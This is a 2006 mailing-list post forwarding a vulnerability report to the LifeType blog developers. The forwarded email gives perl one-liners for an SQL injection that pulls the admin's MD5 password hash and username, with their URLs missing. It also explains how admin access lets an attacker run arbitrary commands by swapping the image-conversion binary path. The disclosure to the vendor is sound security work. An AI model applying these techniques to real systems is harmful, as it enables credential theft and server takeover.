[pLog-svn] Fwd: Security problem

Oscar Renalias oscar at renalias.net
Mon Jul 3 15:57:45 GMT 2006

Can somebody quickly investigate this?

---------- Forwarded message ----------
From: A. Ramos <aramosf at unsec.net>
Date: Jul 3, 2006 5:45 PM
Subject: Security problem
To: contact at lifetype.net

Hello :-)

They are one sql injection in latest version of lifetype:

To get md5 passwd:
perl -MLWP::Simple -e "getprint
| perl -ne 'print "password: ".$1."\n" if /articleId=(\w*).*h3/'

To get admin username:
perl -MLWP::Simple -e "getprint
| perl -ne 'print "admin: ".$1."\n" if /articleId=(\w*).*h3/'

And if you can access to the admin control panel, you can run commands
in the system changing the value of /usr/bin/convert and put your own
command. Upload some picture and wait to resize with the evil command.

I think they are more bugs but I havent time to check for more.

Thank you.


A. Ramos  <aka dab>
mailto: <aramosf at unsec.net>

More information about the pLog-svn mailing list